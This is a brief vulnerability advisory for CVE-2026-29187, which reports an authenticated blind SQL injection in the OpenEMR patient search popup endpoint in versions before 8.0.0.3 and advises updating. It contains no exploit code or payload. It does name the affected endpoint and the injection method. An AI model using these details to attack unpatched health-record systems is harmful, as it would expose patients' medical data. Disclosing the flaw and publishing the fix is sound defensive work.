CVE-2026-29187

Name of the Vulnerable Software and Affected Versions OpenEMR versions prior to 8.0.0.3

Description OpenEMR is an electronic health records and medical practice management application. A Blind SQL Injection issue exists in the Patient Search functionality accessible via the /interface/new/new search popup.php API endpoint. An authenticated attacker can execute arbitrary SQL commands by manipulating the HTTP parameter keys. The vulnerable parameter is not explicitly identified, but the manipulation of HTTP parameter keys allows for the injection.

Recommendations Update to version 8.0.0.3 or later.